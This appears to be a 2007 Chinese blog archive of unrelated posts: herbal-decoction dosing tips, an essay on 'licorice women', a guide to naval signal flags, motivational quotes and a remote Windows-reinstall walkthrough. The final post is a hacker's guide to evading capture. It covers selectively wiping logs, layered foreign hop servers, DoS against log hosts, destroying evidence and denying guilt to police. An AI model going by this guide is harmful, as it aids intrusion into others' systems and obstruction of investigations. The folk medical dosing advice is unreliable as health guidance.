I just rely on intuition! I just rely on intuition!
( Mon, 24 Dec 2007 14:40:33 +0800 )
Description:
中药汤剂服用的方法是否正确,将直接影响药物在人体中的吸收和治疗效果。如何正确服用汤剂才有效呢?应当注意以下几点: 服药时间 正确的服药时间应根据病情来决定,如病在上焦(心、肺),宜饭后服。病在下焦(膀胱、肠部)宜饭前服。清热解毒药、润肠泻下药、滋补药宜空腹服(即指早饭前1小时或晚饭后1小时服药),此时容易吸收。 服药温度 汤剂在治疗一般疾病时均宜采用温服法,但对一些特殊治疗则应讲究特殊的服药温度。凡属理气类药,热则易舒、凉则增滞。凡服解毒剂,均宜冷服,可使毒物之淤滞易于排出,热服则增毒物之宜散。凡热性病(如暑热、中风等)宜冷服,而寒性病(如伤寒感冒等)则宜热服。行血脉通络药宜热服,收涩固精止血之剂则宜冷服。除烦止渴祛暑之剂宜热服,解表药多属辛散之品,功能疏散肌表,宜热服。清热药和消暑药宜冷服。 服药剂量 中药汤剂均是煎煮2-3次后的合并液,再按临床需要进行分次服药。一般来讲,每次以服用150ML为宜,但有的病症也有例外。如发热病人在服用清热解毒剂时,药液可稍多些以助药力。服用生津止渴药,药液量也应多,并可带茶频服。身强者服药剂量应多些,身弱者如儿童和重病人,服药剂量应少些。一般儿童1岁以内服用***药量的1/5;1-3岁服用***药量的1/4;4-7岁服用***药量的1/3;8-10岁服用***药量的1/2;10岁以上就可以服用***的等同药量了. 服药次数 一般汤剂1日分早晚两次服用,清热解毒药可每日服3-4次.补益药应早晚各服一次,发汗药可加服2-3次,含咽药汁可少量多服几次.
( Thu, 20 Dec 2007 16:53:26 +0800 )
Description: 一类女人一味药。 有人曾问我:某某女子长相平庸,语言钝拙,为什么很多男人喜欢? 我便反问:某某女孩艳若桃花,伶牙俐齿,才华阜比仙,为什么众多男士都避之不及? ***多是这样的:一、聪明太过;二、心似蛇蝎;三、矜持淡漠;四、心比天高;五、虚伪做作等等。 我说,平庸女人被人欣赏的最大好处,就是让人舒服、放松。她就像甘草。无论身边的男人多么刻薄、冲动、狠毒、狂躁,抑或消极沉沦,她都能坦然应对,适时调剂,使事情向良性循环方向发展。 甘草乃是中药一种。许多方子,都得加上甘草一味。 当年神农氏尝百草,不知被毒伤麻倒了多少次。后来他发现,各种草药的毒性如果遇到了甘草,立刻能化险为夷,不但要不了人命,还能医治顽疾。古人云:“甘草,味至甘,得中和之性,有调补之功。故毒药得之解其毒,刚药得之和其性,表药得之助其外,下药得之缓其速。” 人生的一剂良方便是过犹不及。可惜, 大家都忙着斗狠争胜、登峰造极、乾坤挪移,此时,如果有甘草一味,稍加调理中和,多少人能有所醒悟,珍惜当下。 男性更是如此,荷尔蒙就是那么一种冲动激素,刚猛、决绝、你死我活。我养鱼的时候发现,那些勇敢的小鱼苗好奇心强喜欢出击的最后都成了大鱼的口中美味。最后活下来的多是母鱼,因为它们胆小自卑,只敢躲在水草丛中悄悄移动。 这正看出了男性荷尔蒙的失败与脆弱。但男性体内还是有甘草成分的,这就是男性推崇的能屈能伸的谋略。你看当年韩信受胯下之辱绝对不是荷尔蒙在作用,而后来野心勃勃要夺刘家天下的欲望倒是荷尔蒙。所以那句名言:成也萧何,败也萧何。应该改成“成乃甘草,败乃荷尔蒙”。 为了增加成功的几率,很多男子寄望自己能寻到一个甘草美女为伴。 有些女人好像就是为了孵化成功男人才来到这个世界上似的。她们可以不以模样见长,却温和圆润、理性通透。在这个女权的世界,她们收敛住自己的光芒,隐身在自己看好的男人背后,通过实现他人来实现自己。 长袖善舞这个词是对甘草美女最好的形容,我的一个女友就是如此。在公司,她做二把手帮着老总打拼天下;在家里,她相夫教子资产节节攀升,从家徒四壁到在香山买别墅。有一天,她忽然对我说生活没意思,“我生命中的两个男人都是成功人士了,我是不是应该离开他们,找个落魄书生帮他从小做大?” 甘草美女不成就别人就会手痒痒的。她太了解自己的能力,不去做一味良药都觉得自己可惜。 长孙皇后就是这么一剂良药。当时女人并不是不能干政的。她既没有像武则天一手遮天控制朝政,也没像中国历史上多数皇后那样外面天塌下来不闻不问,只在意清理后宫。她天生就不是一个帝王,却天生是帮助帝王成就大业的种子。 丈夫李世民处理问题偏激了,小心眼儿了,不公平了,她就出来,如臣子一般直陈时弊。最后还让丈夫心服口服,觉得受益终生。 如果李世民没有缘分遇到长孙,他是不可能如此伟大的。他也有枭雄的偏激、才子的尖刻、皇帝的毒辣、男人的脆弱。可以说长孙皇后是个锥子,把李世民的心胸给开掘得更广大了。 这样的高人确实难找。因为她首先要遇到唐太宗这样的男人,其次她所处的时代不能是女人一说话,御史就疯狂的状态。第三,她是和那些打天下的大臣们共同成长的,有机会深入接触,形成自己的精神领袖地位。是啊,降伏老公容易,让老公的哥们儿都崇拜,需要极度大姐大的胸怀。 有时候翻看一摞摞的中药方子,总能看到“甘草”两字,那么熟悉那么温馨。它们普普通通地混迹于昂贵或低贱的药之间,却没有任何成药敢缺少它。 红花是治妇科病的,百部是杀虱的,牛黄是清热解毒的,三七是止血的。对病症,不同的草药有不同的功用。可它们要起药效却必须通过甘草。我小时候想不通:为什么一味药不能治病,却一定要通过做辅料来达到目的?甘草这种万金油处处有用,却毫无特色,让人看不起。 长大了,越来越觉得甘草的伟大。就像对《爱莲说》一句的理解——中通外直,不蔓不枝。一直以为是说我们做人应该向荷花学习,性格耿直对人知无不言,言无不尽,远离纷争,独善其身。渐渐发现也许还有其他的解释:外直,是对人正直。中通,是内心通透,能够理解和宽容别人的错误。人至察则无徒,你要能明白别人的心机和手段,理解它,然后保持自我的高贵清白。这才是最难的。 甘草的直,就在此。比如李世民弑兄杀弟,逼父皇让位,哪一条符合道德?长孙那时候为什么没直言阻拦?没有目标就不是甘草,有目标却忙着张扬自己的也不是甘草。 男人要成功,不正是需要这样的助手吗?她附着在错综复杂的矛盾、关系之间,调理引导在别人厮杀之后,要保证自己最终得利。 甘草美女,又叫作政治伙伴。有没有爱情次要,关键是她降生于人间就是为了做她投奔者成功的催化剂。在中国历史上,美女如云,还有哪个皇后有长孙的声誉?在美国总统故事里,女强人如云,又有哪个第一夫人比希拉里更璀璨? 她们会说:旺,旺,我就是旺夫。男人的理想不就是想择一旺夫的女子当老婆吗? 可他们忘了,甘草女人,才是最终的胜利者。
( Wed, 29 Aug 2007 13:51:04 +0800 )
Description: 一、满旗
悬挂满旗的时间、排列顺序有着严格的规定。悬挂满旗的时机,一般是迎接政府要元,重大节日,迎接外国军舰来访,出访编队离码头前,到达被访问国港口和在国外停泊时等等。满旗悬挂于两桅横桁之间,并分别连接到舰首、尾旗杆,两桅顶各挂国旗一面,舰首、尾旗杆各挂海军旗一面。驱逐舰挂满旗,一般挂2号旗,约挂67面。这要根据舰艇的实际长度和前后桅杆的距离来定。单桅舰艇则由桅杆横桁连接到舰首、舰尾旗杆,桅顶挂国旗一面。信号旗有5种规格。分为1号、2号、3号、4号、5号。1号最大,5号最小。一套信号旗有46面。其中,26面字母旗、10面数字旗、4面方向旗、3面代旗、1面执行旗、1面答应旗、1面国际答应旗。数字旗为三角形旗,字母旗中有方形旗和燕尾旗,答应旗与国际答应旗为梯形旗等。满旗的排列是两方一尖。方旗是指长方形的旗子,尖旗是指三角形旗子,燕尾旗可作方旗用,梯形旗也叫长旒旗,可作尖旗用。为挂满旗方便,在从舰首旗杆顶到主桅顶、从主桅顶到后桅顶、从后桅顶到舰尾旗杆顶,设有3根细钢丝。我舰艇编队抵达被访国,当第一根缆系到缆柱上时,信号兵迅速用电动滑轮将满旗顺着细钢丝徐徐升起。悬挂满旗有一些特殊的要求:不得悬挂与各国国旗图案相同的通信旗,也不得悬挂用于表示战斗、防核化、防空袭的单旗。满旗中的单独一面,不表示什么意义。我国的出访舰艇编队到达被访国时,被访国的海军舰艇一般要悬挂满旗表示欢迎,其排列顺序与我们相同,不同的是外军的满旗比我们的满旗小一个或两个号。
二、代满旗
出访编队离码头前30分钟,为了离码头方便,一般要降下满旗,改挂代满旗,出港后降下。代满旗就是在两桅顶上挂1号国旗,舰首、尾桅杆上挂海军旗。在规定挂满旗时,如果大雨、大风,也可以改挂代满旗。编队离码头时,方形***的“Q”旗挂到一半,表示编队统一离码头。“Q”旗挂到桅顶,表示开始编队离码头,“Q”旗降下,表示离码头完毕。离码头的标志是解掉最后一根缆。
欢迎、欢送旗语
在欢送我舰艇编队出访时,出访舰艇主桅上悬挂向首长问好的旗组:一组是“LBF”和“LBV”,“L”旗是方形旗,由黄黑黑黄各占四分之一的方块组成,***方块在左上角和右下角,黑色方块在右上角和左下角。“B”旗是红色燕尾旗。“F”旗是白色旗中一个红色菱形,菱形的四个角在旗子四边的正中。“V”旗是白色方形旗中一个粗壮的红色叉号,叉号的四个终端延伸到旗子的四个角。意思是“热烈欢迎首长指导”和“向首长致敬”。113舰第一次出访东南亚时,离开上海前,向送行的海军首长、部队官兵、被访国驻华使节等,挂了两组旗语:“LBN”和“LBZ”。“N”旗是方形旗,四行横向排列,第一行为蓝、白、蓝、白方块,第二行为白、蓝、白、蓝方块,第三行同第一行,第四行同第二行。“Z”旗是方形旗中黄、红、黑、蓝四个等腰三角形组成的信号旗,黄在上、红在下、黑在左、蓝在右,四个等腰三角形的顶尖在旗子的中心点。意思是“感谢首长的关怀和鼓励,保证完成任务。”“谢谢你们,再见!”
航行旗语
舰艇解掉最后一根缆时,在后桅斜桁上升起航行旗,即海军旗。昼夜航行,一直悬挂。这是向人们说明该军舰是属于哪个国家的。有经验的水兵,在大洋上遇到外国军舰,分辨不清是那个国家的,只要用望远镜一看航行旗,就知道是哪个国家的。商船遇到军舰,一般要向军舰敬礼。当商船向军舰敬礼时,军舰上的信号兵应将海军旗降至旗杆顶端的三分之一处表示还礼,然后将海军旗升到顶表示礼毕。军舰与军舰相遇时,只鸣哨敬礼与还礼,不使用旗语。
三、海上补给旗语
出访舰艇编队航行一段时间后,需要进行油水补给,补给分横向和纵向两种。无论哪种方式补给,都要挂信号旗,表示补给过程中的各种命令和补给动作。接收舰和补给舰都要挂旗组:“VP”,“P”旗是在蓝色方形旗中间一个白色小矩形,其长宽各占上、下、左、右的三分之一。同时在另一桅边挂球形、菱形、球形3个形体信号,表示舰艇操纵受限。向过往的船只说明:“我船正在进行补给作业,请注意安全。”
倒车、转向旗语
舰艇离靠码头或在航道中航行需要倒车时,为了安全起见,要将“S”旗升到顶,“S”旗是白色方旗中间一个蓝色小矩形。意思是告诉过往船只:“我已倒车,请注意安全!”舰艇向左转向时,挂“I”旗。“I”旗是方形***旗中间一个黑色圈,意思是:“我向左转向。”“I”旗升到一半为:“我准备向左转向”,升到顶为:“我正在向左转向”,“I”旗降下为:“我转向完毕!”舰艇向右转向时,挂“E”旗。“E”旗是方形旗,上蓝下红,各占二分之一。意思是“我向右转向”。舰艇在机动时,除了使用旗语外,根据国际避碰章程规定,还需要用汽笛配合:一右二左三倒车。即挂“S”旗时,鸣汽笛三短声。挂“I”时,鸣汽笛两短声。挂“E”旗时,鸣汽笛一短声。升降旗的步骤与向左转向基本相同。
跨越领海线、赤道旗语
出访舰艇编队跨越领海线、赤道时,为了激发出访官兵的出访热情,一般要组织宣誓仪式,同时要挂航行代满旗。航行代满旗是在两桅上悬挂国旗,舰首、尾旗杆上不挂海军旗。112舰、113舰、167舰、82舰、953舰等都组织过类似的活动。在组织这些活动时,飘扬的五星红旗、整齐的水兵方阵、紧攥的拳头、嘹亮的誓言、雪白的浪花,形成了特有的海上风景。
四、手旗旗语
手旗旗语也是一种海上通信方式。适用于白天、距离较近且视距良好的情况下。夜间距离较近时,一般使用灯光通信。手旗是一种方形旗,面积较小,根部套有一根木棍。手旗通信需要使用两面旗子,信号兵每手各持一面旗子,站在舷边较高较突出的部位,通过旗子相对于身体的不同位置,表达着不同的字母和符号。例如,左手垂直举起,右手平行伸出表示“P”。右手垂直举起、左手平行伸出表示“J”。两手平行伸出表示“R”。两手垂直举起表示隔音。几个拼音字母组成一个字,若干个字组成一个意思。手旗还可以为本舰(船)放下的小艇指示方向。
靠离外国码头前、后的旗语
我出访舰艇编队进入被访国领海线前,被访国一般派出军舰前来迎接。进入领海线时,根据双方协定,悬挂被访国国旗。被访国国旗挂在我主桅杆的右舷,我国的国旗挂在主桅杆的左舷。靠码头时,“H”旗到顶,表示“开始靠码头”。带上第一根缆时,“H”旗降下。“H”旗是方形旗,纵向白、红各占一半。意思是:“我已靠码头完毕。”带上第一根缆时,开始挂满旗和舰首、尾的海军旗。如被访国军舰挂出欢迎旗,我应挂出感谢旗组表示感谢。离码头时与在我国离码头时一样。在国外访问期间,一般来说,每天都要安排隆重升旗。在升起双方国旗的同时升起满旗。
海事旗语过去用于船只之间的通信,一般用法是拼成短句,另外单个旗帜也有特殊含义。现在的海事旗语一般只用于装饰用途。
特殊含义
a = 潜水员工作中,保持距离
b = 危险货物
c = 是
d = 保持距离
e = 调整航线至右舷
f = 伤残
g = 需要领航员
h = 领航员在船上
i = 调整航线至左舷
j = 火灾,保持距离
k = 期望对话
l = 你必须立即停止
m = 我已经停止(另外可表示:船上有医生)
n = 不
o = 有人落海
p = 即将启航
q = 我请求
s = 引擎向船尾
t = 保持距离(另外可表示:请求运输)
u = 你正面临危险
v = 请求协助
w = 请求医疗协助
x = 停止你的意图
y = 抛锚中
z = 请求拖船
N c = 我处于危难中
答语旗:1)作为小数点。2)表示明白对方的意思,也代表发送信息结束。
说明:一般旗语打英文缩写.比如“欢迎来到中国“----WTC(welcome to China), “再见“---GDB等等
( Thu, 9 Aug 2007 15:29:30 +0800 )
Description:
1. 每天告诉自己一次,我真的很不错
2. 生气是拿别人做错的事来惩罚自己
3. 生活中若没有朋友,就像生活中没有阳光一样
4. 明天的希望,让我们忘了今天的痛苦
5. 生活若剥去了理想、梦想、幻想,那生命便只是一堆空架子
6. 发光并非太阳的专利,你也可以发光
7. 愚者用肉体监视心灵,智者用心灵监视肉体
8. 获致幸福的不二法门是珍视你所拥有的、遗忘你所没有的
9. 贪婪是最真实的贫穷,满足是最真实的财富
10. 你可以用爱得到全世界,你也可以用恨失去全世界
11. 人的价值,在遭受诱惑的一瞬间被决定
12. 年轻是我们唯一拥有权利去编织梦想的时光
13. 青春一经典当即永不再赎
14. 没有了爱的语言,所有的文字都是乏味的
15. 真正的爱,应该超越生命的长度、心灵的宽度、灵魂的深度
16. 爱的力量大到可以使人忘记一切,却又小到连一粒嫉妒的沙石也不能容纳
17. 当一个人真正觉悟的一刻,他放弃追寻外在世界的财富,而开始追寻他内心世界的真正财富
18. 只要有信心,人永远不会挫败
19. 不论你在什么时候开始,重要的是开始之後就不要停止
20. 不论你在什么时候结束,重要的是结束之後就不要悔恨
21. 人若软弱就是自己最大的敌人
22. 人若勇敢就是自己最好的朋友
23. 『 不可能 』只存在於蠢人的字典里
24. 抱最大的希望,为最大的努力,做最坏的打算
25. 家!甜蜜的家!天下最美好的莫过於家
26. 游手好闲会使人心智生锈
27. 每一件事都要用多方面的角度来看它
28. 有理想在的地方,地狱就是天堂
29. 有希望在的地方,痛苦也成欢乐
30. 所有的胜利,与征服自己的胜利比起来,都是微不足道
31. 所有的失败,与失去自己的失败比起来,更是微不足道
32. 上帝从不埋怨人们的愚昧,人们却埋怨上帝的不公平
33. 美好的生命应该充满期待、惊喜和感激
34. 世上最累人的事,莫过於虚伪的过日子
35. 觉得自己做的到和不做的到,其实只在一念之间
36. 第一个青春是上帝给的;第二个的青春是靠自己努力的
37. 少一点预设的期待,那份对人的关怀会更自在
38. 思想如钻子,必须集中在一点钻下去才有力量
39. 人只要不失去方向,就不会失去自己
40. 如果你曾歌颂黎明,那么也请你拥抱黑夜
41. 问候不一定要慎重其事,但一定要真诚感人
42. 未经一番寒彻骨,焉得梅花扑鼻香
43. 当你能飞的时候就不要放弃飞
44. 当你能梦的时候就不要放弃梦
45. 当你能爱的时候就不要放弃爱
46. 生命太过短暂,今天放弃了明天不一定能得到
47. 天才是百分之一的灵感加上百分之久十久的努力
48. 人总是珍惜未得到的,而遗忘了所拥有的
49. 快乐要懂得分享,才能加倍的快乐
50. 自己要先看得起自己,别人才会看得起你
51. 一个今天胜过两个明天
52. 要铭记在心;每天都是一年中最美好的日子
53. 乐观者在灾祸中看到机会;悲观者在机会中看到灾祸
54. 有勇气并不表示恐惧不存在,而是敢面对恐惧、克服恐惧
55. 肯承认错误则错已改了一半
56. 明天是世上增值最快的一块土地,因它充满了希望
57. 理想的路总是为有信心的人预备著
58. 所有欺骗中,自欺是最为严重的
59. 人生最大的错误是不断担心会犯错
60. 把你的脸迎向阳光,那就不会有阴影
61. 经验是由痛苦中粹取出来的
62. 用最少的悔恨面对过去
63. 用最少的浪费面对现在
64. 用最多的梦面对未来
65. 快乐不是因为拥有的多而是计较的少
66. 你的选择是做或不做,但不做就永远不会有机会
67. 如你想要拥有完美无暇的友谊,可能一辈子找不到朋友
68. 不如意的时候不要尽往悲伤里钻,想想有笑声的日子吧
69. 把自己当傻瓜,不懂就问,你会学的更多
70. 要纠正别人之前,先反省自己有没有犯错
71. 因害怕失败而不敢放手一搏,永远不会成功
72. 要克服生活的焦虑和沮丧,得先学会做自己的主人
73. 你不能左右天气,但你能转变你的心情
74. 孤单寂寞与被遗弃感是最可怕的贫穷
75. 想像力比知识更重要
76. 漫无目的的生活就像出海航行而没有指南针
77. 好好扮演自己的角色,做自己该做的事
78. 一切伟大的行动和思想,都有一个微不足道的开始
79. 得意时应善待他人,因为你失意时会需要他们
80. 学做任何事得按部就班,急不得
81. 人生重要的不是所站的位置,而是所朝的方向
( Wed, 8 Aug 2007 10:28:54 +0800 )
Description: 放暑假,MM回家了,要在QQ中见面。如果她的电脑出了点问题,在线教她用各种专杀去杀,仍无济于事之后,只好考虑给重装系统。怎么装呢,继续看下去就知道了。 重装系统,想必很多人都试过,坐在要重装系统电脑前,按步就班来做就是了。但给远在几十公里甚至上千公里外的电脑重装系统呢?用“远程协助”功能来搞。这个方法试过多次,感觉还可以,虽然在应用上受到一定的限制,但对于喜欢搞搞新意思的朋友来说,也是一件好玩的事情。 一、发生背景 偶尔利用QQ的“远程协助”给网友清除Rootkit木马,曾有网友想重装系统,但他不会装。于是我想是否可以远程帮他重装呢?经过多方研究,终于找到一个远程重装系统的方法。 二、基本思路 因为对方的电脑是用QQ与自己连接的,一旦进入重装过程,QQ就会断掉,不能控制对方的电脑,所以,***一定要是全自动的才行。XP的正常***模式也可以实现全自动应答***,但有个前提,就是事先要格式化C盘,否则,还是会出现手动选择界面。相比之下,GHOST版的系统能够实现全自动***,而且还集成了常用软件,更可贵的是,它还装了QQ以及设置了ADSL拨号,这样系统***完后,对方可以上QQ,双方又重新连接上,从而能够进行一些后续设置或***游戏。 怎样才能让对方的电脑进入自动***过程呢?用DOS/XP双启动,这样重启XP后,就可以自动进入dos。 怎么搞成DOS/XP双启动呢,当然可以用“矮人dos”之类的软件,但要修改其中的代码,不如自己做个dos。起初是在dos的批处理中,加入这段代码:ghost.exe -clone,mode=pload,src=x:x\winx 2.gho,dst=1:1 -sure -r ,然后用“虚拟软驱”这个软件搞XP/DOS双启动,然后修改boot.ini文件,从而实现自动***系统的。 后来,发现bt下载到东海大侠的“GHOSTXP_SP2电脑公司特别版”的ISO文件中已经有个“硬盘***器”,能够自动提取gho文件、搞XP/DOS双启动、修改boot.in文件等。哈哈,就改用它啦,免得要用大量篇幅讲述如何修改dos系统文件代码。 当如果没有下到“GHOSTXP_SP2电脑公司特别版”的话,可以到这里(http://soft.ylmf.com/downinfo/547.html)下载“OneKey Ghost”来用,不过要事先手工提取ISO中的gho文件。 三、具体操作、实战截图 第一步,在QQ中进行“远程协助”连接。至于如何进行远程控制,这里就不详细说明了。 第二步,为对方下载ghost版的iso文件和“OneKey Ghost”。 1、把下载ghost版的下载网址发到对方,然后下载。我用的是东海GHOSTXP_SP2电脑公司特别版v7.X版本,小路工作室(http://www.wzlu.com/)、小猫下载(http://down2.kittydown.com/)等可以下载,也可以用“雨林木风”或“jujumao”的ghost版。 2、下载“OneKey Ghost”(如果是下东海的7.x版本,就不用下这个了),将“OneKey Ghost”的下载地址在QQ中发过去,然后用下载软件下载,这个软件很小,很快就下完了。 下载ISO的时间较长,一般要3个小时左右,这时,你应该断开远程协助,告诉他下完后再联络,一般是要等到第二天再来的啦,呵呵!不要尝试从自己这边发gho文件过去,因为除了速度太慢的不说,容易断线问题让你白忙乎,一旦断了,又得从头开始。 第三步,运行“硬盘***器”或“OneKey Ghost”。 (一) “硬盘***器”的使用步骤:
1、解压。如图
javascript
:if(this.width> creen.width-500)this.width=screen.width-500;"border=0
2、运行解压出来的“简易虚拟光驱”。如图
javascript:if(this.width> creen.width-500)this.width=screen.width-500;"border=0
3、装载ISO文件,并最小化“简易虚拟光驱”窗口。如图
javascript:if(this.width> creen.width-500)this.width=screen.width-500;"border=0
javascript:if(this.width> creen.width-500)this.width=screen.width-500;"border=0
javascript:if(this.width> creen.width-500)this.width=screen.width-500;"border=0
javascript:if(this.width> creen.width-500)this.width=screen.width-500;"border=0
javascript:if(this.width> creen.width-500)this.width=screen.width-500;"border=0
4、运行“寻找虚拟光驱的gho文件然后***”,加载GHO文件,然后按提示重启系统。如图
javascript:if(this.width> creen.width-500)this.width=screen.width-500;"border=0
javascript:if(this.width> creen.width-500)this.width=screen.width-500;"border=0 (二)OneKey Ghost的使用过程:
1、 提取ISO镜像中的GHO文件(记住,要选占空间最大的那个GHO文件)。如图
javascript:if(this.width> creen.width-500)this.width=screen.width-500;"border=0
javascript:if(this.width> creen.width-500)this.width=screen.width-500;"border=0
2、运行OneKey Ghost,加载gho文件,然后按提示重启系统。如图
javascript:if(this.width> creen.width-500)this.width=screen.width-500;"border=0
javascript:if(this.width> creen.width-500)this.width=screen.width-500;"border=0
javascript:if(this.width> creen.width-500)this.width=screen.width-500;"border=0 重启后,QQ连接就断了。因此要事先告诉对方,耐心等待系统***完后,再重启一次系统,然后上QQ再“开远程协助”,以便做些扫尾工作:如设置分辩率、***杀毒软件、游戏等,如果有兴趣,再给他***个系统还原软件,如还原精灵、影子、冰封、雨过天晴之类。 四、注意事项 1、重装系统前记得为对方备份C盘中必要的资料。 2、对方不能太菜,起码懂得连接到internet。如设置IP、DNS等(局域网用户),设置拨号帐号和密码(ADSL拨号用户),否则系统装完后上不了网。 3、如果对方是校园网的,除非你跟他是同学校的,否则不要尝试这个方法,因为QQ从外面连接到校园网时速度慢得离谱。 4、如果对方的网卡太另类的话,除非他会***网卡驱动,否则也不要试。幸好这种情况极少发生。 5、如果MM跟你是同一个城市的,最好亲自到她那里重装系统,顺便交流交流,哈哈! 再说两句,如果你以前已经帮MM做了ghost备份的话,直接用OneKey Ghost就可以搞定。
( Fri, 3 Aug 2007 22:17:17 +0800 )
Description: 据我所知,很多人学习黑客技术都是从如何进入他人系统开始的,到处收集各种exploits、后门、木马等。但是,我最早学习的却不是这些,而是这次我要讲的:黑客自我保护技术。因为,当时(现在我仍然这样认为)我觉得就算你的黑客技术再厉害,能攻入这样那样的系统,但当***给你带上手铐的时候,这一切恐怕一点意义都没有了吧!所以,我认为一个没有绝对自保能力的黑客,根本不能算是黑客。不要用什么我不去非法入侵他人系统,不触犯法律等满口的仁义道德去辩解什么!因为,如果你想在黑客技术上得到提升,就必须不断的入侵。这种灵活复杂的实战经验是模拟攻击环境所不能给予的。也不要认为自己技术高超,不会被***或者安全人员抓到,比你技术高的人多得是,还不是照样进了牢房!当你hack一个饱受入侵之苦而开始对系统安全敏感了的站点时,很可能这就是你的最后一次hack了。
内容:
1.谨慎
自我约束。小心谨慎到什么时候都不会有害处。在入侵一个系统之前,请准确评估你将可能遇到的风险,准备和编写好将要用到的tools,然后,要等待恰当的时机。如果可能的话,先调查好什么时间段服务器处于无人职守状态。做不到这些,你将永远成不了真正的hacker。
有些朋友可能不理解,会认为我太胆小。当然,平时我们入侵的那些小站可能不会给我们带来太大的祸端,但如果你的入侵与金钱和权威挂了钩就完全不一样了。这时,如果你不做好最坏的打算,任何一点小的差错都可能把你击倒。其实,就算你入侵的是个小站,也是存在风险的,要知道,我们正在给别人的工作或生活带来麻烦甚至是恶梦。他们很想阻止你,甚至想把你送入地狱!尽管你可能不认为这是犯罪,但事实是这就是犯罪!
要记住,一旦你被牵扯到一个入侵案件中时,你会发现你的hacker污名可能会跟随你相当长的时间,几年,甚至是一生。任何一个有案底的人都很难找到一份好工作!除非你自己做老板!^_^
当你理解了以上的风险后,请不要认为做额外的反追踪工作而感到愚蠢,不要为别人嘲笑你太谨慎而烦心.不要因为太懒或侥幸而放弃修改log文件!作为一名真正的黑客,你必须做好每一件你要做的事情!
当你认为我说的不是废话而是真理,并且切实的执行了,那么你已经是一个谨慎的hacker了。当你考虑和你聊天的人是否可*,考虑你的Email、QQ、phone没有处于监视中,那么反追踪已经成为你生活的一部分了。如果你不想这么去做,那么请想象一下你被捕时的惨状吧!女友还会跟你吗?你的父母不会流泪吗?你不会失去工作和学习吗?请让这些没有发生的机会吧!如果你到了现在还认为我在浪费你的时间或你不去这么去做,那么请离hack远点。你已经对中国的hacker社会和你的hacker朋友构成了潜在的威胁!
2.基础
如果你从不在***、Email和QQ上谈论hacking相关的话题,并且硬盘上没有敏感的私人数据的话,你可以不往下看了!因为每一个hacker都会与其它一些hacker保持联系,并且把一些相关数据保存在某个地方!如果你是个hacker,请看下面我给出的一点建议。
使用可*的加密程序加密所有敏感数据。
将重要私人数据加密后存储在只有你自己知道的、国外的网络硬盘或稳定的空间上(空间提供商要能做到对用户信息保密)。地址和密码请牢记在大脑里,因为只有这里最安全!(密码的健壮性要好,还要容易记忆,不会轻易被破解)。对数据做一个备份,然后放到安全的地方,最好不是家里(当然也要加密)。
不要用***和你的hacker朋友谈论hack。如果非要谈,最好找公用***(***号码记录不要写在纸上,应该存为一个文件并且多次高强度加密)
如果你认为你的入侵行为很危险,应该考虑干扰方案!网络***,其它Hacker都有可能监视你的行动。如果中国的网络***技术好且拥有先进的设备的话,我想他们可以得到他们想要的任何东西!早就听说国外有种设备可以通过捕获计算机发射的电子脉冲在100米以外监视你的电脑屏幕,不知国内的网络***有没有。
我们这种网虫或者说计算机狂人,很多人都有自己的主页空间帐户、学校网站登陆帐户、公司系统登陆帐户、QQ帐户、Email帐户(这里顺便说一下,最好我们每个人准备两个Email,一个用于和hack圈子里的朋友联系,另一个作为普通的日常应用)等。这里要注意,不要使用这些帐户做任何非法和可能会令他人怀疑的事情!决不能在这些帐户下存储任何和hack有关的信息和tools。和其它hacker交流的Email最好经过PGP加密,因为你的Email对Email服务器的维护者和网警来说是透明的。不要用这些帐号表明你对hack感兴趣,顶多对安全防范感兴趣就行了,再深点就不要了。
对于log文件,我想每个人都很熟悉,我也不想再多说了。提点建议,最好清除logs时不要全部清除,这样等于告诉管理员有人入侵了他的系统,清除和你有关的就行了。
除了logs,其它一些痕迹也一定要注意!比如,我在3389肉鸡上装了个扫描器,扫描完成后记得把扫描结果文件删掉,某些远程控制软件会自动记录你连接过的主机设置,如:Radmin,这也要注意。
好的肉鸡要使用稳妥、安全、隐蔽的后门,不要随便用不熟悉的木马程序。
3.高级
(1)熟练运用Sniffer,并灵活运用这些技巧,可以令我们更安全。
(2)使用跳板。有时我们的hack活动可能会被发现,我就遇到过两次。我们正在hack的站点可能因为某些原因被关掉,这时什么都别管尽快清除痕迹离开,一般不会有什么事情。但如果他们想追踪我们的来路(原因可能是想抓住你,也可能是想看看你的跳板强壮性)就很危险了。这种情况下,如果你使用跳板入侵的话就会给他们的追踪造成困难!下面我说一下跳板的要求:
拥有管理员权限;只作跳板使用,平时不用;定期更换其它的服务器做跳板,至少一个月不在使用原来的跳板。这样他们就很难追踪到我们的痕迹了。
使用多层跳板,他们想追踪就必须一个一个的突破。
(3)堡垒主机。什么是堡垒主机?它是你的多层跳板中直接和你正在使用的主机建立了连接的主机,也就是和你最近的一层跳板。一旦他们能追踪到你的堡垒主机,你就有麻烦了。因为,***只要调查一下就能发现你的存在。因此,堡垒主机应该尽量稳固,并且尽量用国外主机(跳板也应该尽量用国外的)。当然,最根本的是决不能让他们追踪的你的堡垒主机。
(4)如果你入侵的服务器使用了专门的log主机,那么会麻烦一点,一般的log主机很难攻入,这时可以用DoS让它停止工作。
(5)查看一下主机是否***了其它的log软件,如果有的话,应该修改它们生成的logs。
(6)攻入系统后,要时不时的看看管理员是否登陆了,如果管理员登陆了,我们就应该尽快跑路了。
(7)注意蜜罐,好的蜜罐系统是很难发现异常的。这种情况遇到的很少,但不排除可能性。如何发现蜜罐,就看你的思维是否清晰、头脑是否冷静、对系统是否熟悉、敏锐的洞察力、还有的就是运气了。
(8)如果使用了Sniffer,请注意加密Sniffer的输出结果。
4.被怀疑时
一旦上面的一切技巧都没能保护住倒霉的你。你就应该采取一些行动,令他们得不到不利于你的证据!但不要采取攻击性行动,可以以静制动,等上1、2个月看看情况再说。当你被怀疑后,你一定要想办法警告你的hacker朋友不要给你发任何Email,断绝所有与hack有关的联系。加密敏感数据,销毁所有hack数据,帐号数据,***号码等纸张,这些都是网警喜欢要的。这期间可以玩点别的,比如说写个程序什么的(可别傻到编hacker程序哦)。
5.被捕
一旦绝顶倒霉的你真的被捕了,那么你应该注意:
首先,找个律师。和律师商量好对策。
其次,不要相信***找到了关键证据之类的言辞,他们可能是诈供。另外,就算他们有了什么证据也不是没有希望,因为电子方面的东西很容易伪造,比如说:IP地址。因此,在国际上对于其是否可以作为证据一直很有争议。所以,除非你被抓个现形,或者拍下了你hacking的过程,否则不要承认,这么做你可能还有希望。
如果你真的认了罪。记住,一定不要出卖其它的hacker朋友,否则,你可能会遭到报复。再者,这也是起码的职业道德
( Mon, 30 Jul 2007 10:24:37 +0800 )
